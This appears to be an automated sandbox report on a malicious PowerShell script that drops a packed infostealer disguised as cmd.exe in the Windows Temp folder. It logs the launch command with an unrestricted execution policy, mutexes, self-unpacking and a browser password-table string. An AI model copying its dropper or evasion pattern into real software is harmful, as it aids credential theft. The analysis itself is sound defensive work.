Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040D1BE	10_2_0040D1BE
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00413250	10_2_00413250
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00416250	10_2_00416250
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041B26C	10_2_0041B26C
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040A2D0	10_2_0040A2D0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00410280	10_2_00410280
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043831C	10_2_0043831C
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004343C2	10_2_004343C2
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042E3D0	10_2_0042E3D0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00413462	10_2_00413462
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00425470	10_2_00425470
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00422400	10_2_00422400
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040E4F0	10_2_0040E4F0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004094F0	10_2_004094F0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041E4A0	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00403550	10_2_00403550
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00441550	10_2_00441550
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00446526	10_2_00446526
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040C5E0	10_2_0040C5E0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00412637	10_2_00412637
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041C742	10_2_0041C742
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00422770	10_2_00422770
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00426770	10_2_00426770
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004047D2	10_2_004047D2
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043F7F7	10_2_0043F7F7
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041579F	10_2_0041579F
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041D7BF	10_2_0041D7BF
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00438850	10_2_00438850
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042C870	10_2_0042C870
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00421800	10_2_00421800
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004198CE	10_2_004198CE
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_004128D3	10_2_004128D3
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041989B	10_2_0041989B
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042D940	10_2_0042D940
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041A94D	10_2_0041A94D
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00441958	10_2_00441958
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041C96E	10_2_0041C96E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00436971	10_2_00436971
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00432917	10_2_00432917
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042092F	10_2_0042092F
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040CA50	10_2_0040CA50
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00410A76	10_2_00410A76
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00427A14	10_2_00427A14
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042CAD0	10_2_0042CAD0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00421AE0	10_2_00421AE0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00447B70	10_2_00447B70
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00408B00	10_2_00408B00
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00402B30	10_2_00402B30
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042EBC0	10_2_0042EBC0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042EBA6	10_2_0042EBA6
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00438C10	10_2_00438C10
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040ECC0	10_2_0040ECC0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042ACF4	10_2_0042ACF4
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00426CA0	10_2_00426CA0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043AD10	10_2_0043AD10
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00437D35	10_2_00437D35
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0040ADC0	10_2_0040ADC0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00420DC0	10_2_00420DC0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00407DE0	10_2_00407DE0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00434DE3	10_2_00434DE3
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00446DB9	10_2_00446DB9
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043FE50	10_2_0043FE50
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00443E50	10_2_00443E50
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041DE0E	10_2_0041DE0E
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00421E10	10_2_00421E10
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043DE1D	10_2_0043DE1D
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00446E30	10_2_00446E30
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041AEC5	10_2_0041AEC5
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00403EF0	10_2_00403EF0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042BEF3	10_2_0042BEF3
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00415EB1	10_2_00415EB1
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00447F60	10_2_00447F60
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00408F70	10_2_00408F70
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042DF73	10_2_0042DF73
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0041BF01	10_2_0041BF01
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00423F30	10_2_00423F30
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00413FCE	10_2_00413FCE
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0042EFDA	10_2_0042EFDA
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02661AD0	10_2_02661AD0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02661160	10_2_02661160
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02657E10	10_2_02657E10
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0265F680	10_2_0265F680
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0266D739	10_2_0266D739

Source: C:\Windows\Temp\cmd.exe	Code function: String function: 0040B310 appears 41 times
Source: C:\Windows\Temp\cmd.exe	Code function: String function: 00419060 appears 115 times

Source: cmd.exe.0.dr

Static PE information: Number of sections : 11 > 10

Source: cmd.exe.0.dr

Static PE information: Section: iqwrhdu ZLIB complexity 1.021484375

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@5/21@3/4

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_004407C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,#2,#2,#8,#9,#6,#6,#6,#6,GetVolumeInformationW,

10_2_004407C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\Temp\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Jawmf49fj49d8rt45toht9e5hy
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aipcn1ic.ate.ps1

Jump to behavior

Source: Yara match	File source: 10.0.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\cmd.exe, type: DROPPED

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: cmd.exe, 0000000A.00000003.1936119903.000000000377C000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1936533138.000000000377B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2014067358.000000000378A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.2013846577.000000000377D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000A.00000003.1936293323.0000000003795000.00000004.00000800.00020000.00000000.sdmp, 091AF3BA01C3CA5E.dat.10.dr, 9AE0A732660712D9.dat.10.dr, FEF0DD79AA87957E.dat.10.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: get_txt.ps1

Virustotal: Detection: 13%

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\get_txt.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\cmd.exe "C:\Windows\Temp\cmd.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: efswrt.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: avifil32.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Temp\cmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\notepad.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Windows\Temp\cmd.exe

Unpacked PE file: 10.2.cmd.exe.400000.0.unpack

Source: cmd.exe.0.dr

Static PE information: real checksum: 0x562316 should be: 0x5cd076

Source: cmd.exe.0.dr	Static PE information: section name: .didata
Source: cmd.exe.0.dr	Static PE information: section name: iqwrhdu

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_045CD308 push eax; mov dword ptr [esp], edx	0_2_045CD31C
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0044B599 pushfd ; ret	10_2_0044B5B0
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0044DA13 push esp; retf	10_2_0044DA1B
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_00446A80 push eax; mov dword ptr [esp], F6F1F0C3h	10_2_00446A83
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0043CF21 push ss; retf	10_2_0043CF27
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_0268135A push ebx; ret	10_2_0268135B
Source: C:\Windows\Temp\cmd.exe	Code function: 10_2_02680316 push dword ptr [esp+20h]; retn 0024h	10_2_02680342
